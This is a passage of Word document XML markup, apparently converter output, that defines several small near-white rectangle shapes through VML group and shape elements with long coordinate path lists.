3,8458,2014,8458,2016,8458,2017,8458,2019,8458,2020,8458,2022,8458,2024,8458,2025,8458,2027,8458,2029,8458,2030,8458,2032,8458,2034,8458,2036,8458,2038,8458,2040,8458,2042,8458,2044,8458,2046,8458,2048,8458,2051,8458,2053,8458,2055,8458,2057,8458,2060,8458,2062,8458,2065,8458,2067,8458,2070,8458,2072,8458,2075,8458,2078,8458,2081,8458,2083,8458,2086,8458,2089,8458,2092,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8459,2095,8459,2095,8459,2095,8459,2095,8459,2095,8459,2095,8459,2095,8459,2095,8459,2095,8460,2095,8460,2095,8460,2095,8460,2095,8461,2095,8461,2095,8461,2095,8462,2095,8462,2095,8462,2095,8463,2095,8463,2095,8464,2095,8464,2095,8465,2095,8465,2095,8466,2095,8467,2095,8467,2095,8468,2095,8469,2095,8469,2095,8470,2095,8471,2095,8472,2095,8473,2095,8474,2095,8475,2095,8476,2095,8477,2095,8478,2095,8480,2095,8481,2095,8482,2095,8483,2095,8485,2095,8486,2095,8488,2095,8489,2095,8491,2095,8493,2095,8494,2095,8496,2095,8498,2095,8500,2095,8502,2095,8504,2095,8506,2095,8508,2095,8510,2095,8512,2095,8515,2095,8517,2095,8520,2095,8522,2095,8525,2095,8527,2095,8530,2095,8533,2095,8536,2095,8539,2095,8542,2095,8545,2095,8548,2095,8551,2095,8555,2095,8558,2095,8561,2095,8565,2095,8569,2095,8572,2095,8576,2095,8580,2095,8584,2095,8588,2095,8592,2095,8596,2095,8601,2095,8605,2095,8610,2095,8614,2095,8619,2095,8624,2095,8629,2095,8634,2095,8639,2095,8644,2095,8649,2095,8654,2095,8660,2095,8665,2095,8671,2095,8677,2095,8683,2095,8689,2095,8695,2095,8701,2095,8707,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2094,8713,2094,8713,2094,8713,2094,8713,2094,8713,2094,8713,2094,8713,2094,8713,2093,8713,2093,8713,2093,8713,2093,8713,2093,8713,2092,8713,2092,8713,2092,8713,2092,8713,2091,8713,2091,8713,2091,8713,2090,8713,2090,8713,2090,8713,2089,8713,2089,8713,2089,8713,2088,8713,2088,8713,2087,8713,2087,8713,2086,8713,2086,8713,2085,8713,2084,8713,2084,8713,2083,8713,2083,8713,2082,8713,2081,8713,2080,8713,2080,8713,2079,8713,2078,8713,2077,8713,2076,8713,2075,8713,2075,8713,2074,8713,2073,8713,2072,8713,2071,8713,2070,8713,2068,8713,2067,8713,2066,8713,2065,8713,2064,8713,2063,8713,2061,8713,2060,8713,2059,8713,2057,8713,2056,8713,2054,8713,2053,8713,2051,8713,2050,8713,2048,8713,2047,8713,2045,8713,2043,8713,2041,8713,2040,8713,2038,8713,2036,8713,2034,8713,2032,8713,2030,8713,2028,8713,2026,8713,2024,8713,2022,8713,2019,8713,2017,8713,2015,8713,2013,8713,2010,8713,2008,8713,2005,8713,2003,8713,2000,8713,1998,8713,1995,8713,1992,8713,1990,8713,1987,8713,1984,8713,1981,8713,1978,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8713,1975,8712,1975,8712,1975,8712,1975,8712,1975,8712,1975,8711,1975,8711,1975,8711,1975,8710,1975,8710,1975,8710,1975,8709,1975,8709,1975,8708,1975,8708,1975,8707,1975,8707,1975,8706,1975,8706,1975,8705,1975,8704,1975,8704,1975,8703,1975,8702,1975,8701,1975,8700,1975,8700,1975,8699,1975,8698,1975,8697,1975,8696,1975,8694,1975,8693,1975,8692,1975,8691,1975,8690,1975,8688,1975,8687,1975,8685,1975,8684,1975,8682,1975,8681,1975,8679,1975,8677,1975,8676,1975,8674,1975,8672,1975,8670,1975,8668,1975,8666,1975,8664,1975,8661,1975,8659,1975,8657,1975,8654,1975,8652,1975,8650,1975,8647,1975,8644,1975,8642,1975,8639,1975,8636,1975,8633,1975,8630,1975,8627,1975,8624,1975,8620,1975,8617,1975,8614,1975,8610,1975,8607,1975,8603,1975,8599,1975,8595,1975,8592,1975,8588,1975,8584,1975,8579,1975,8575,1975,8571,1975,8566,1975,8562,1975,8557,1975,8553,1975,8548,1975,8543,1975,8538,1975,8533,1975,8528,1975,8523,1975,8517,1975,8512,1975,8506,1975,8501,1975,8495,1975,8489,1975,8483,1975,8477,1975,8471,1975,8465,1975,8458e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:421.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,8430" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:8430;width:130;height:270" coordorigin="2070,8430" coordsize="130,270" path="m2095,8458l2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2095,8458,2096,8458,2096,8458,2096,8458,2096,8458,2096,8458,2096,8458,2096,8458,2096,8458,2096,8458,2097,8458,2097,8458,2097,8458,2097,8458,2097,8458,2098,8458,2098,8458,2098,8458,2098,8458,2099,8458,2099,8458,2099,8458,2100,8458,2100,8458,2100,8458,2101,8458,2101,8458,2102,8458,2102,8458,2102,8458,2103,8458,2103,8458,2104,8458,2105,8458,2105,8458,2106,8458,2106,8458,2107,8458,2108,8458,2108,8458,2109,8458,2110,8458,2110,8458,2111,8458,2112,8458,2113,8458,2114,8458,2115,8458,2116,8458,2116,8458,2117,8458,2118,8458,2119,8458,2121,8458,2122,8458,2123,8458,2124,8458,2125,8458,2126,8458,2128,8458,2129,8458,2130,8458,2132,8458,2133,8458,2134,8458,2136,8458,2137,8458,2139,8458,2140,8458,2142,8458,2144,8458,2145,8458,2147,8458,2149,8458,2151,8458,2152,8458,2154,8458,2156,8458,2158,8458,2160,8458,2162,8458,2164,8458,2166,8458,2168,8458,2171,8458,2173,8458,2175,8458,2178,8458,2180,8458,2182,8458,2185,8458,2187,8458,2190,8458,2192,8458,2195,8458,2198,8458,2201,8458,2203,8458,2206,8458,2209,8458,2212,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8458,2215,8459,2215,8459,2215,8459,2215,8459,2215,8459,2215,8459,2215,8459,2215,8459,2215,8459,2215,8460,2215,8460,2215,8460,2215,8460,2215,8461,2215,8461,2215,8461,2215,8462,2215,8462,2215,8462,2215,8463,2215,8463,2215,8464,2215,8464,2215,8465,2215,8465,2215,8466,2215,8467,2215,8467,2215,8468,2215,8469,2215,8469,2215,8470,2215,8471,2215,8472,2215,8473,2215,8474,2215,8475,2215,8476,2215,8477,2215,8478,2215,8480,2215,8481,2215,8482,2215,8483,2215,8485,2215,8486,2215,8488,2215,8489,2215,8491,2215,8493,2215,8494,2215,8496,2215,8498,2215,8500,2215,8502,2215,8504,2215,8506,2215,8508,2215,8510,2215,8512,2215,8515,2215,8517,2215,8520,2215,8522,2215,8525,2215,8527,2215,8530,2215,8533,2215,8536,2215,8539,2215,8542,2215,8545,2215,8548,2215,8551,2215,8555,2215,8558,2215,8561,2215,8565,2215,8569,2215,8572,2215,8576,2215,8580,2215,8584,2215,8588,2215,8592,2215,8596,2215,8601,2215,8605,2215,8610,2215,8614,2215,8619,2215,8624,2215,8629,2215,8634,2215,8639,2215,8644,2215,8649,2215,8654,2215,8660,2215,8665,2215,8671,2215,8677,2215,8683,2215,8689,2215,8695,2215,8701,2215,8707,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2215,8713,2214,8713,2214,8713,2214,8713,2214,8713,2214,8713,2214,8713,2214,8713,2214,8713,2213,8713,2213,8713,2213,8713,2213,8713,2213,8713,2212,8713,2212,8713,2212,8713,2212,8713,2211,8713,2211,8713,2211,8713,2210,8713,2210,8713,2209,8713,2209,8713,2209,8713,2208,8713,2208,8713,2207,8713,2207,8713,2206,8713,2206,8713,2205,8713,2205,8713,2204,8713,2203,8713,2203,8713,2202,8713,2201,8713,2200,8713,2200,8713,2199,8713,2198,8713,2197,8713,2196,8713,2196,8713,2195,8713,2194,8713,2193,8713,2192,8713,2191,8713,2190,8713,2189,8713,2187,8713,2186,8713,2185,8713,2184,8713,2183,8713,2181,8713,2180,8713,2179,8713,2177,8713,2176,8713,2174,8713,2173,8713,2171,8713,2170,8713,2168,8713,2167,8713,2165,8713,2163,8713,2161,8713,2160,8713,2158,8713,2156,8713,2154,8713,2152,8713,2150,8713,2148,8713,2146,8713,2144,8713,2142,8713,2140,8713,2137,8713,2135,8713,2133,8713,2130,8713,2128,8713,2125,8713,2123,8713,2120,8713,2118,8713,2115,8713,2112,8713,2110,8713,2107,8713,2104,8713,2101,8713,2098,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8713,2095,8712,2095,8712,2095,8712,2095,8712,2095,8712,2095,8711,2095,8711,2095,8711,2095,8710,2095,8710,2095,8710,2095,8709,2095,8709,2095,8708,2095,8708,2095,8707,2095,8707,2095,8706,2095,8706,2095,8705,2095,8704,2095,8704,2095,8703,2095,8702,2095,8701,2095,8700,2095,8700,2095,8699,2095,8698,2095,8697,2095,8696,2095,8694,2095,8693,2095,8692,2095,8691,2095,8690,2095,8688,2095,8687,2095,8685,2095,8684,2095,8682,2095,8681,2095,8679,2095,8677,2095,8676,2095,8674,2095,8672,2095,8670,2095,8668,2095,8666,2095,8664,2095,8661,2095,8659,2095,8657,2095,8654,2095,8652,2095,8650,2095,8647,2095,8644,2095,8642,2095,8639,2095,8636,2095,8633,2095,8630,2095,8627,2095,8624,2095,8620,2095,8617,2095,8614,2095,8610,2095,8607,2095,8603,2095,8599,2095,8595,2095,8592,2095,8588,2095,8584,2095,8579,2095,8575,2095,8571,2095,8566,2095,8562,2095,8557,2095,8553,2095,8548,2095,8543,2095,8538,2095,8533,2095,8528,2095,8523,2095,8517,2095,8512,2095,8506,2095,8501,2095,8495,2095,8489,2095,8483,2095,8477,2095,8471,2095,8465,2095,8458e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:520.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,10410" coordsize="250,270">
        <v:shape style="position:absolute;left:1950;top:10410;width:250;height:270" coordorigin="1950,10410" coordsize="250,270" path="m1975,10439l1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1975,10439,1976,10439,1976,10439,1976,10439,1976,10439,1976,10439,1976,10439,1977,10439,1977,10439,1977,10439,1977,10439,1977,10439,1978,10439,1978,10439,1978,10439,1979,10439,1979,10439,1980,10439,1980,10439,1981,10439,1981,10439,1982,10439,1982,10439,1983,10439,1983,10439,1984,10439,1985,10439,1986,10439,1986,10439,1987,10439,1988,10439,1989,10439,1990,10439,1991,10439,1992,10439,1993,10439,1994,10439,1995,10439,1996,10439,1997,10439,1999,10439,2000,10439,2001,10439,2003,10439,2004,10439,2006,10439,2007,10439,2009,10439,2011,10439,2012,10439,2014,10439,2016,10439,2018,10439,2020,10439,2022,10439,2024,10439,2026,10439,2028,10439,2030,10439,2033,10439,2035,10439,2038,10439,2040,10439,2043,10439,2045,10439,2048,10439,2051,10439,2054,10439,2056,10439,2059,10439,2063,10439,2066,10439,2069,10439,2072,10439,2075,10439,2079,10439,2082,10439,2086,10439,2090,10439,2093,10439,2097,10439,2101,10439,2105,10439,2109,10439,2113,10439,2117,10439,2122,10439,2126,10439,2131,10439,2135,10439,2140,10439,2145,10439,2150,10439,2154,10439,2160,10439,2165,10439,2170,10439,2175,10439,2181,10439,2186,10439,2192,10439,2197,10439,2203,10439,2209,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10439,2215,10440,2215,10440,2215,10440,2215,10440,2215,10440,2215,10440,2215,10440,2215,10440,2215,10440,2215,10441,2215,10441,2215,10441,2215,10441,2215,10442,2215,10442,2215,10442,2215,10443,2215,10443,2215,10443,2215,10444,2215,10444,2215,10445,2215,10445,2215,10446,2215,10446,2215,10447,2215,10448,2215,10448,2215,10449,2215,10450,2215,10450,2215,10451,2215,10452,2215,10453,2215,10454,2215,10455,2215,10456,2215,10457,2215,10458,2215,10459,2215,10461,2215,10462,2215,10463,2215,10464,2215,10466,2215,10467,2215,10469,2215,10470,2215,10472,2215,10474,2215,10475,2215,10477,2215,10479,2215,10481,2215,10483,2215,10485,2215,10487,2215,10489,2215,10491,2215,10493,2215,10496,2215,10498,2215,10501,2215,10503,2215,10506,2215,10508,2215,10511,2215,10514,2215,10517,2215,10520,2215,10523,2215,10526,2215,10529,2215,10532,2215,10536,2215,10539,2215,10542,2215,10546,2215,10550,2215,10553,2215,10557,2215,10561,2215,10565,2215,10569,2215,10573,2215,10577,2215,10582,2215,10586,2215,10591,2215,10595,2215,10600,2215,10605,2215,10610,2215,10615,2215,10620,2215,10625,2215,10630,2215,10635,2215,10641,2215,10646,2215,10652,2215,10658,2215,10664,2215,10670,2215,10676,2215,10682,2215,10688,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2215,10694,2214,10694,2214,10694,2214,10694,2214,10694,2214,10694,2214,10694,2213,10694,2213,10694,2213,10694,2213,10694,2212,10694,2212,10694,2212,10694,2211,10694,2211,10694,2210,10694,2210,10694,2210,10694,2209,10694,2208,10694,2208,10694,2207,10694,2207,10694,2206,10694,2205,10694,2205,10694,2204,10694,2203,10694,2202,10694,2201,10694,2200,10694,2199,10694,2198,10694,2197,10694,2196,10694,2195,10694,2194,10694,2193,10694,2191,10694,2190,10694,2189,10694,2187,10694,2186,10694,2184,10694,2183,10694,2181,10694,2179,10694,2178,10694,2176,10694,2174,10694,2172,10694,2170,10694,2168,10694,2166,10694,2164,10694,2162,10694,2160,10694,2157,10694,2155,10694,2153,10694,2150,10694,2147,10694,2145,10694,2142,10694,2139,10694,2137,10694,2134,10694,2131,10694,2128,10694,2124,10694,2121,10694,2118,10694,2115,10694,2111,10694,2108,10694,2104,10694,2101,10694,2097,10694,2093,10694,2089,10694,2085,10694,2081,10694,2077,10694,2073,10694,2068,10694,2064,10694,2059,10694,2055,10694,2050,10694,2045,10694,2041,10694,2036,10694,2031,10694,2025,10694,2020,10694,2015,10694,2010,10694,2004,10694,1998,10694,1993,10694,1987,10694,1981,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10694,1975,10693,1975,10693,1975,10693,1975,10693,1975,10693,1975,10692,1975,10692,1975,10692,1975,10691,1975,10691,1975,10691,1975,10690,1975,10690,1975,10689,1975,10689,1975,10688,1975,10688,1975,10687,1975,10687,1975,10686,1975,10685,1975,10685,1975,10684,1975,10683,1975,10682,1975,10681,1975,10681,1975,10680,1975,10679,1975,10678,1975,10677,1975,10675,1975,10674,1975,10673,1975,10672,1975,10671,1975,10669,1975,10668,1975,10666,1975,10665,1975,10663,1975,10662,1975,10660,1975,10658,1975,10657,1975,10655,1975,10653,1975,10651,1975,10649,1975,10647,1975,10645,1975,10642,1975,10640,1975,10638,1975,10635,1975,10633,1975,10631,1975,10628,1975,10625,1975,10623,1975,10620,1975,10617,1975,10614,1975,10611,1975,10608,1975,10605,1975,10601,1975,10598,1975,10595,1975,10591,1975,10588,1975,10584,1975,10580,1975,10576,1975,10573,1975,10569,1975,10565,1975,10560,1975,10556,1975,10552,1975,10547,1975,10543,1975,10538,1975,10534,1975,10529,1975,10524,1975,10519,1975,10514,1975,10509,1975,10504,1975,10498,1975,10493,1975,10487,1975,10482,1975,10476,1975,10470,1975,10464,1975,10458,1975,10452,1975,10446,1975,10439e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:229.500pt;margin-top:520.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4590,10410" coordsize="130,270">
        <v:shape style="position:absolute;left:4590;top:10410;width:130;height:270" coordorigin="4590,10410" coordsize="130,270" path="m4616,10439l4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4616,10439,4617,10439,4617,10439,4617,10439,4617,10439,4617,10439,4617,10439,4617,10439,4617,10439,4617,10439,4617,10439,4617,10439,4617,10439,4618,10439,4618,10439,4618,10439,4618,10439,4618,10439,4618,10439,4619,10439,4619,10439,4619,10439,4619,10439,4620,10439,4620,10439,4620,10439,4621,10439,4621,10439,4621,10439,4622,10439,4622,10439,4622,10439,4623,10439,4623,10439,4624,10439,4624,10439,4625,10439,4625,10439,4626,10439,4626,10439,4627,10439,4628,10439,4628,10439,4629,10439,4630,10439,4630,10439,4631,10439,4632,10439,4632,10439,4633,10439,4634,10439,4635,10439,4636,10439,4637,10439,4638,10439,4639,10439,4640,10439,4641,10439,4642,10439,4643,10439,4644,10439,4645,10439,4646,10439,4648,10439,4649,10439,4650,10439,4651,10439,4653,10439,4654,10439,4656,10439,4657,10439,4659,10439,4660,10439,4662,10439,4663,10439,4665,10439,4667,10439,4668,10439,4670,10439,4672,10439,4674,10439,4676,10439,4677,10439,4679,10439,4681,10439,4683,10439,4685,10439,4688,10439,4690,10439,4692,10439,4694,10439,4696,10439,4699,10439,4701,10439,4704,10439,4706,10439,4709,10439,4711,10439,4714,10439,4716,10439,4719,10439,4722,10439,4725,10439,4728,10439,4730,10439,4733,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10439,4736,10440,4736,10440,4736,10440,4736,10440,4736,10440,4736,10440,4736,10440,4736,10440,4736,10440,4736,10441,4736,10441,4736,10441,4736,10441,4736,10442,4736,10442,4736,10442,4736,10443,4736,10443,4736,10443,4736,10444,4736,10444,4736,10445,4736,10445,4736,10446,4736,10446,4736,10447,4736,10448,4736,10448,4736,10449,4736,10450,4736,10450,4736,10451,4736,10452,4736,10453,4736,10454,4736,10455,4736,10456,4736,10457,4736,10458,4736,10459,4736,10461,4736,10462,4736,10463,4736,10464,4736,10466,4736,10467,4736,10469,4736,10470,4736,10472,4736,10474,4736,10475,4736,10477,4736,10479,4736,10481,4736,10483,4736,10485,4736,10487,4736,10489,4736,10491,4736,10493,4736,10496,4736,10498,4736,10501,4736,10503,4736,10506,4736,10508,4736,10511,4736,10514,4736,10517,4736,10520,4736,10523,4736,10526,4736,10529,4736,10532,4736,10536,4736,10539,4736,10542,4736,10546,4736,10550,4736,10553,4736,10557,4736,10561,4736,10565,4736,10569,4736,10573,4736,10577,4736,10582,4736,10586,4736,10591,4736,10595,4736,10600,4736,10605,4736,10610,4736,10615,4736,10620,4736,10625,4736,10630,4736,10635,4736,10641,4736,10646,4736,10652,4736,10658,4736,10664,4736,10670,4736,10676,4736,10682,4736,10688,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4736,10694,4735,10694,4735,10694,4735,10694,4735,10694,4735,10694,4735,10694,4734,10694,4734,10694,4734,10694,4734,10694,4734,10694,4733,10694,4733,10694,4733,10694,4732,10694,4732,10694,4732,10694,4731,10694,4731,10694,4731,10694,4730,10694,4730,10694,4729,10694,4729,10694,4729,10694,4728,10694,4727,10694,4727,10694,4726,10694,4726,10694,4725,10694,4725,10694,4724,10694,4723,10694,4722,10694,4722,10694,4721,10694,4720,10694,4719,10694,4719,10694,4718,10694,4717,10694,4716,10694,4715,10694,4714,10694,4713,10694,4712,10694,4711,10694,4710,10694,4709,10694,4708,10694,4706,10694,4705,10694,4704,10694,4703,10694,4701,10694,4700,10694,4699,10694,4697,10694,4696,10694,4694,10694,4693,10694,4691,10694,4689,10694,4688,10694,4686,10694,4684,10694,4683,10694,4681,10694,4679,10694,4677,10694,4675,10694,4673,10694,4671,10694,4669,10694,4667,10694,4665,10694,4663,10694,4661,10694,4659,10694,4656,10694,4654,10694,4652,10694,4649,10694,4647,10694,4644,10694,4642,10694,4639,10694,4636,10694,4634,10694,4631,10694,4628,10694,4625,10694,4622,10694,4619,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10694,4616,10693,4616,10693,4616,10693,4616,10693,4616,10693,4616,10692,4616,10692,4616,10692,4616,10691,4616,10691,4616,10691,4616,10690,4616,10690,4616,10689,4616,10689,4616,10688,4616,10688,4616,10687,4616,10687,4616,10686,4616,10685,4616,10685,4616,10684,4616,10683,4616,10682,4616,10681,4616,10681,4616,10680,4616,10679,4616,10678,4616,10677,4616,10675,4616,10674,4616,10673,4616,10672,4616,10671,4616,10669,4616,10668,4616,10666,4616,10665,4616,10663,4616,10662,4616,10660,4616,10658,4616,10657,4616,10655,4616,10653,4616,10651,4616,10649,4616,10647,4616,10645,4616,10642,4616,10640,4616,10638,4616,10635,4616,10633,4616,10631,4616,10628,4616,10625,4616,10623,4616,10620,4616,10617,4616,10614,4616,10611,4616,10608,4616,10605,4616,10601,4616,10598,4616,10595,4616,10591,4616,10588,4616,10584,4616,10580,4616,10576,4616,10573,4616,10569,4616,10565,4616,10560,4616,10556,4616,10552,4616,10547,4616,10543,4616,10538,4616,10534,4616,10529,4616,10524,4616,10519,4616,10514,4616,10509,4616,10504,4616,10498,4616,10493,4616,10487,4616,10482,4616,10476,4616,10470,4616,10464,4616,10458,4616,10452,4616,10446,4616,10439e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:241.500pt;margin-top:520.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4830,10410" coordsize="130,270">
        <v:shape style="position:absolute;left:4830;top:10410;width:130;height:270" coordorigin="4830,10410" coordsize="130,270" path="m4856,10439l4856,10439,4856,10439,4856,10439,4856,10439,4856,10439,4856,10439,4856,10439,4856,10439,4856,10439,4856,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4857,10439,4858,10439,4858,10439,4858,10439,4858,10439,4858,10439,4858,10439,4859,10439,4859,10439,4859,10439,4859,10439,4860,10439,4860,10439,4860,10439,4860,10439,4861,10439,4861,10439,4861,10439,4862,10439,4862,10439,4863,10439,4863,10439,4863,10439,4864,10439,4864,10439,4865,10439,4865,10439,4866,10439,4866,10439,4867,10439,4868,10439,4868,10439,4869,10439,4870,10439,4870,10439,4871,10439,4872,10439,4873,10439,4873,10439,4874,10439,4875,10439,4876,10439,4877,10439,4878,10439,4879,10439,4880,10439,4881,10439,4882,10439,4883,10439,4884,10439,4885,10439,4887,10439,4888,10439,4889,10439,4890,10439,4892,10439,4893,10439,4894,10439,4896,10439,4897,10439,4899,10439,4900,10439,4902,10439,4903,10439,4905,10439,4907,10439,4908,10439,4910,10439,4912,10439,4914,10439,4916,10439,4918,10439,4919,10439,4921,10439,4924,10439,4926,10439,4928,10439,4930,10439,4932,10439,4934,10439,4937,10439,4939,10439,4941,10439,4944,10439,4946,10439,4949,10439,4951,10439,4954,10439,4957,10439,4959,10439,4962,10439,4965,10439,4968,10439,4971,10439,4974,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10439,4977,10440,4977,10440,4977,10440,4977,10440,4977,10440,4977,10440,4977,10440,4977,10440,4977,10440,4977,10441,4977,10441,4977,10441,4977,10441,4977,10442,4977,10442,4977,10442,4977,10443,4977,10443,4977,10443,4977,10444,4977,10444,4977,10445,4977,10445,4977,10446,4977,10446,4977,10447,4977,10448,4977,10448,4977,10449,4977,10450,4977,10450,4977,10451,4977,10452,4977,10453,4977,10454,4977,10455,4977,10456,4977,10457,4977,10458,4977,10459,4977,10461,4977,10462,4977,10463,4977,10464,4977,10466,4977,10467,4977,10469,4977,10470,4977,10472,4977,10474,4977,10475,4977,10477,4977,10479,4977,10481,4977,10483,4977,10485,4977,10487,4977,10489,4977,10491,4977,10493,4977,10496,4977,10498,4977,10501,4977,10503,4977,10506,4977,10508,4977,10511,4977,10514,4977,10517,4977,10520,4977,10523,4977,10526,4977,10529,4977,10532,4977,10536,4977,10539,4977,10542,4977,10546,4977,10550,4977,10553,4977,10557,4977,10561,4977,10565,4977,10569,4977,10573,4977,10577,4977,10582,4977,10586,4977,10591,4977,10595,4977,10600,4977,10605,4977,10610,4977,10615,4977,10620,4977,10625,4977,10630,4977,10635,4977,10641,4977,10646,4977,10652,4977,10658,4977,10664,4977,10670,4977,10676,4977,10682,4977,10688,4977,10694,4977,10694,4977,10694,4977,10694,4977,10694,4977,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4976,10694,4975,10694,4975,10694,4975,10694,4975,10694,4975,10694,4975,10694,4974,10694,4974,10694,4974,10694,4974,10694,4973,10694,4973,10694,4973,10694,4973,10694,4972,10694,4972,10694,4972,10694,4971,10694,4971,10694,4970,10694,4970,10694,4970,10694,4969,10694,4969,10694,4968,10694,4968,10694,4967,10694,4966,10694,4966,10694,4965,10694,4965,10694,4964,10694,4963,10694,4963,10694,4962,10694,4961,10694,4960,10694,4960,10694,4959,10694,4958,10694,4957,10694,4956,10694,4955,10694,4954,10694,4953,10694,4952,10694,4951,10694,4950,10694,4949,10694,4948,10694,4946,10694,4945,10694,4944,10694,4943,10694,4941,10694,4940,10694,4939,10694,4937,10694,4936,10694,4934,10694,4933,10694,4931,10694,4930,10694,4928,10694,4926,10694,4925,10694,4923,10694,4921,10694,4919,10694,4917,10694,4915,10694,4913,10694,4911,10694,4909,10694,4907,10694,4905,10694,4903,10694,4901,10694,4899,10694,4896,10694,4894,10694,4892,10694,4889,10694,4887,10694,4884,10694,4882,10694,4879,10694,4876,10694,4874,10694,4871,10694,4868,10694,4865,10694,4862,10694,4859,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10694,4856,10693,4856,10693,4856,10693,4856,10693,4856,10693,4856,10692,4856,10692,4856,10692,4856,10691,4856,10691,4856,10691,4856,10690,4856,10690,4856,10689,4856,10689,4856,10688,4856,10688,4856,10687,4856,10687,4856,10686,4856,10685,4856,10685,4856,10684,4856,10683,4856,10682,4856,10681,4856,10681,4856,10680,4856,10679,4856,10678,4856,10677,4856,10675,4856,10674,4856,10673,4856,10672,4856,10671,4856,10669,4856,10668,4856,10666,4856,10665,4856,10663,4856,10662,4856,10660,4856,10658,4856,10657,4856,10655,4856,10653,4856,10651,4856,10649,4856,10647,4856,10645,4856,10642,4856,10640,4856,10638,4856,10635,4856,10633,4856,10631,4856,10628,4856,10625,4856,10623,4856,10620,4856,10617,4856,10614,4856,10611,4856,10608,4856,10605,4856,10601,4856,10598,4856,10595,4856,10591,4856,10588,4856,10584,4856,10580,4856,10576,4856,10573,4856,10569,4856,10565,4856,10560,4856,10556,4856,10552,4856,10547,4856,10543,4856,10538,4856,10534,4856,10529,4856,10524,4856,10519,4856,10514,4856,10509,4856,10504,4856,10498,4856,10493,4856,10487,4856,10482,4856,10476,4856,10470,4856,10464,4856,10458,4856,10452,4856,10446,4856,10439e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
